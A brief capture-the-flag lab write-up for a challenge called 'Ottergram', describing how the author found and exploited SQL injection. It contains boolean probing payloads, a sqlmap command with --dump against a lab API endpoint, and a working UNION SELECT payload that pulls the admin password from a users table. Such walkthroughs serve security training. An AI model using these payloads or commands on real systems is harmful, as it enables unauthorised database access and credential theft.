Ottergram

Our hint today is SQLi.

Like always, I clicked happily through the application so my proxy could capture enough traffic for me to investigate. When looking for SQLi, I mainly focus on things that I suspect are part of a query. This can be the login/password combination, usernames, MFA-codes,... Once I identify those endpoints, I add ' and 1=1— - to all of them. If one of those endpoints returns the same value as without the payload, I'm pretty confident there's a SQLi. I found an endpoint that would return the same results with that payload, so I tried ' and 1=2 and got an error, so SQLi is possible.

Inside Burp I had to encode the payload with %20 instead of + so it became '%20AND%201=1%20--

After I confirmed that SQLi was possible on that endpoint, I ran SQLMap with that request using

└─$ sqlmap -u "https://<lab_id>/api/profile/otter_lover" 
-H "Authorization: Bearer <TOKEN>" 
--method GET --level 3 --risk 2 --batch --dump

Inside the response I found a users table with the passwords.

The admin's password was the flag 🇧🇪

The easy payload is '%20UNION%20SELECT%20null,%20null,%20null,%20null,%20null,%20null,%20password%20from%20users%20where%20username='admin'--%20-

PreviousSQLi NextCafeClub

Last updated 2 months ago